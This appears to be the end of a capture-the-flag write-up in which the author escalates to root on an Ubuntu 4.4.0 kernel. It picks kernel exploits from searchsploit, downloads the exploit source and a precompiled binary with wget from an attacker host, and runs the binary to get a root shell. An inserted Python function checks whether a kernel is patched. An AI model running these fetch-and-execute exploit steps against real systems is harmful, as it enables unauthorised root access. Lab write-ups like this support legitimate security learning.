----------------------------------------------------------------------------- ----------------------------------------
(snip)
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation          | exploits/linux/local/41458.c
(snip)
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation       | exploits/linux/local/44298.c

The ones that felt likely to work.
Try "41458.c".
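As an added example, not part of the original writeup, a patch-level check a defender can run against the `uname -a` output and searchsploit titles above: it reads the "< 4.4.0-116" bound stated in the second title and reports whether the running kernel's Ubuntu ABI revision is still below it. The only bound used is the one the title carries; a title without one, like the 41458 entry, gets None rather than a guess, and the regexes for the uname and title formats are assumptions based on the output above.

```python
import re

# Kernel release as printed by `uname -a` / `uname -r`: major.minor.patch-ABI, e.g. 4.4.0-62-generic.
RELEASE_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)-(\d+)\b")
# The "< X" upper bound that some searchsploit titles carry, e.g. "Linux Kernel < 4.4.0-116 (...)".
UPPER_BOUND_RE = re.compile(r"<\s*(\d+\.\d+\.\d+-\d+)")


def parse_release(text):
    """Return (major, minor, patch, abi) from a uname line or release string.
    On Ubuntu the ABI number only increases within one kernel series, so it is what to compare."""
    m = RELEASE_RE.search(text)
    if m is None:
        raise ValueError("no kernel release found in %r" % text)
    return tuple(int(x) for x in m.groups())


def exploit_upper_bound(title):
    """The release named after '<' in a searchsploit title, or None when the title states no bound."""
    m = UPPER_BOUND_RE.search(title)
    return m.group(1) if m else None


def kernel_in_affected_range(uname_line, title):
    """True if the running kernel is older than the fixed release the title names.
    None when the title has no bound or names a different series: the title alone cannot decide,
    and the actual CVE entry / Ubuntu security notice has to be consulted instead."""
    bound = exploit_upper_bound(title)
    if bound is None:
        return None
    running, fixed = parse_release(uname_line), parse_release(bound)
    if running[:3] != fixed[:3]:
        return None  # different kernel series; ABI numbers are not comparable across series
    return running[3] < fixed[3]


if __name__ == "__main__":
    # uname line and title taken from the output above
    uname = "Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 GNU/Linux"
    title = "Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation"
    print(kernel_in_affected_range(uname, title))  # True: ABI 62 is below 116, host is behind the fix
```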

$ cd /tmp
$ ls
systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU
$ wget 10.10.10.3/41458.c
--2020-05-11 15:17:10--  http://10.10.10.3/41458.c
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16554 (16K) [text/plain]
Saving to: '41458.c'

     0K .......... ......                                     100% 46.3M=0s

2020-05-11 15:17:10 (46.3 MB/s) - '41458.c' saved [16554/16554]

$ ls
41458.c
systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU
$ gcc 41458.c
/bin/sh: 7: gcc: not found

Huh, no gcc?
Download a compiled one, then.

$ wget 10.10.10.3/a.out
--2020-05-11 15:18:07--  http://10.10.10.3/a.out
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23776 (23K) [application/octet-stream]
Saving to: 'a.out'

     0K .......... .......... ...                             100% 68.2M=0s

2020-05-11 15:18:07 (68.2 MB/s) - 'a.out' saved [23776/23776]

$ chmod 777 a.out
$ ./a.out
bash: cannot set terminal process group (1374): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)

Incidentally, this caused a kernel panic afterwards.
Maybe because I did it on the tty?
"/usr/share/exploitdb/exploits/linux/local/44298.c" also got root.
That one did not cause a kernel panic.

The end

  • "404.php" was here: "/wordpress/wp-content/themes/twentyfourteen/404.php"
  • locate gcc: if I had searched for gcc, could I have compiled locally?
  • What was the ".bash_history" in "/var/www"?